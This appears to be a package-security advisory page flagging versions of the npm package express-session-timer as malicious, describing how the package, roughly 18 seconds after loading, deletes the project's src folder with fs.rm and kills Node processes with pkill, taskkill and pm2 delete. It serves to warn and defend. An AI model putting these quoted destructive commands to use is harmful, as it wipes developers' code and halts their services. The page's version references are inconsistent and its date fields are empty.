OpenSSF/OSV advisory MAL-2026-16065 confirms this npm version as malicious. express-session-timer@1.0.1 schedules an unconditional destructive routine at module load time. Approximately 18 seconds after `require('express-session-timer')`, the package recursively removes `<cwd>/src` via `fs.rm(path.join(process.cwd(),'src'), {recursive:true, force:true})` and terminates Node processes with `pkill -f "node.*${process.cwd()}"` on Unix, `taskkill /IM node.exe /F` on Windows, and `npx pm2 delete...
This report applies to express-session-timer@1.0.14.
1.0.0, 1.0.1, 1.0.13, 1.0.14, 1.0.16, 1.0.11, 1.0.15
See version security history for other recorded verdicts.
Evidence last updated: .
Source advisory published: .
This report uses published external intelligence. The advisory does not provide a separate source-code analysis for each listed version.